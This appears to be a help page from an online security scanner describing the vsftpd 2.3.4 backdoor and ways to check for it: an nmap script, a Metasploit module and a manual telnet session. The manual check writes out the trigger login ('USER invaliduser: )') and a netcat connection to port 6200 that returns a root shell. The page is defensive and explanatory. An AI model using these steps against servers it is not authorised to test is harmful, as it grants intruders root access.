S E C U R I T Y

Loading

Details
Stay Up To Date
Parent Checks

  • FTP Vulnerabilities

Need Membership

Yes

Need Proof Of Ownership

No

Estimate Time (Second)

5

Vsftpd Backdoor Checker Detail

If you are using VSFTPD for FTP server, it is better to check your system for a backdoor vulnerability that emerged in the past years.

What is FTP ?

FTP (File Transfer Protocol) is a TCP-based protocol that enables file transfer between the server and the client. There are different software offering FTP service and VSFTPD is only one of them.


What is vsFTP Backdoor Vulnerability ?

In 2011, attackers managed to place a code snippet with a backdoor to vsFTPd 2.3.4 version source code.

If you installed vsFTPd 2.3.4 version with changed source code in 2011, you might be impacted by this vulnerability. People with malicious intent who exploit this vulnerability can access to user rights with the highest authorisation in the target system.


How To Check vsFTP Backdoor Vulnerability ?

You can check vsFTP Backdoor vulnerability with our free and online vsFTP Backdoor Vulnerability Checker. tool To do this, you can start by typing your domain name in the form on top of the page and start scanning.

Or you can run nmap --script ftp-vsftpd-backdoor -p 21 Target_Host command on nmap tool which can be installed to all operating systems.

Also, you can use vsftpd_234_backdoor exploit module of “Metasploit Framework” to check the vulnerability.

Lastly, you can check manually. If your FTP server is impacted from this vulnerability, you will have a result similar to the following:

 telnet 172.19.0.100 21
  Trying 172.19.0.100...
  Connected to 172.19.0.100.
  Escape character is '^]'.
   220 (vsFTPd 2.3.4)
  USER invaliduser: )
   331 Please specify the password.
  PASS invalidpass
  ^]
  telnet> quit
  Connection closed.
            

When you deactivate the telnet connection and try to connect with 6200 port by using netcat or telnet command, you can see that operating system command runs with authorised user rights:

 nc 172.19.0.100 6200
  id
  uid=0 (root) gid=0 (root)
            

Some Advice for Common Problems

To eliminate this vulnerability, you need to update FTP software to the newest version. It is not possible to fix it from any settings.